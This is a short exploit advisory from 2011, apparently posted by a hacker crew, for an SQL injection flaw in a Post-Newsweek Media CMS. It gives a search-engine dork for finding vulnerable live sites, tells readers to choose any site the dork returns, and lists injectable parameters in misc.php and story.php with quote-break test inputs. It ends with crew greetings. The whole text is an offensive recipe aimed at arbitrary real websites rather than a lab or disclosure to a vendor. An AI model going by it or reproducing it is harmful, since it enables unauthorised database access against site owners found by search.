#(+)Exploit Title: Post-Newsweek Media CMS SQL Injection Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 6.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecutioner()yahoo.com #(+) dork : intext:© Post-Newsweek Media inurl:php?id= #(+) Category : Web Apps [SQli] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork "intext:© Post-Newsweek Media inurl:php?id=" on search engine *SQL injection Vulnerability* # [+]http://site.com/cms/misc.php?id='4 # [+]http://site.com/cms/misc.php?id=[SQLI] # [+]http://site.com/cms/story.php?id='1050 # [+]http://site.com/cms/story.php?id=[SQLI] # [+]http://site.com/cms/story.php?county=DCMilitaryEd&id='931 # [+]http://site.com/cms/story.php?county?id=[SQLI] ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew ########################################################################